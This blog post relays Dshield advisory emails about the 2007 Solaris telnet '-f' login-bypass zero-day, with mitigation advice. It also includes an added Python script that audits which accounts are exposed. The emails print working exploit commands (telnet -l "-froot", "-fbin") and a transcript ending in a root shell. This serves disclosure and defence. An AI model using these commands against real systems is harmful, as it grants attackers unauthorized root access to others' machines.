Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning, I received an email from Dshield about a Solaris Telnet 0-day. The article about this issue:

You can also read these emails:
Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs.
We are still testing. Please use our contact form at
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console",
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start

Email 3:
HD is not 100% accurate. It can be -froot if and only if you have
commented the CONSOLE setting within /etc/default/login . This
setting prevents network logons to root account and is set by
default. However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions. Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot"
Connected to somehost (
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot"
Connected to somehost (
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

Trying userids with non-standard shells such as /bin/false, or
one similar to the one in the jass package, will also kick the end
user out. Users that have been locked (passwd -l userid) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.
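As an added audit example (not from the Dshield emails or this blog), the script below applies the rules Email 3 describes to constructed /etc/default/login, /etc/passwd and /etc/shadow excerpts and lists which accounts an unpatched telnetd would hand a shell to without a password. The *LK* lock marker and the treatment of /bin/false as a non-interactive shell are assumptions about Solaris 10.

```python
import re

# Constructed /etc/default/login samples: CONSOLE commented out (risky) vs the default (safe).
LOGIN_DEFAULTS_RISKY = "# constructed sample\n#CONSOLE=/dev/console\nPASSREQ=YES\n"
LOGIN_DEFAULTS_SAFE = "# constructed sample\nCONSOLE=/dev/console\nPASSREQ=YES\n"

# Constructed /etc/passwd and /etc/shadow excerpts (not from a real host).
PASSWD = """root:x:0:0:Super-User:/:/sbin/sh
bin:x:2:2::/usr/bin:
nobody:x:60001:60001:NFS Anonymous:/:
alice:x:100:10::/export/home/alice:/bin/ksh
bob:x:101:10::/export/home/bob:/bin/false
carol:x:102:10::/export/home/carol:/bin/sh
"""
SHADOW = """root:HASH:6445::::::
bin:NP:6445::::::
nobody:*LK*:6445::::::
alice:HASH:13555::::::
bob:HASH:13555::::::
carol:*LK*HASH:13555::::::
"""

# Assumption: Solaris 10 login(1) ends the session at once for these shells.
NON_INTERACTIVE_SHELLS = {"/bin/false", "/usr/bin/false"}

def console_restricted(login_defaults):
    """True when an uncommented CONSOLE= line exists: root may log in only at the console."""
    return any(re.match(r"\s*CONSOLE=", line) for line in login_defaults.splitlines())

def exposed_accounts(login_defaults, passwd, shadow):
    """Accounts the -f login bypass would reach without a password, by the rules in the emails:
    root needs CONSOLE commented out; locked accounts (passwd -l, stored as a *LK* prefix in
    /etc/shadow) get 'Login incorrect'; non-interactive shells kick the user out. 'NP' (no
    password) is not a lock, which is why -fbin works on a default Solaris 10 install."""
    locked = {f[0] for f in (l.split(":") for l in shadow.splitlines() if l.strip())
              if f[1].startswith("*LK*")}
    exposed = []
    for line in passwd.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        user, shell = fields[0], fields[6] or "/usr/bin/sh"  # empty shell field = default shell
        if user in locked or shell in NON_INTERACTIVE_SHELLS:
            continue
        if user == "root" and console_restricted(login_defaults):
            continue
        exposed.append(user)
    return sorted(exposed)
```

With CONSOLE commented out the constructed host exposes root, bin and alice; with the default CONSOLE line only bin and alice remain, which is why blocking port 23 or disabling telnetd is the fix rather than the login defaults alone.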

That's why I don't like to use Solaris......hehehehe....

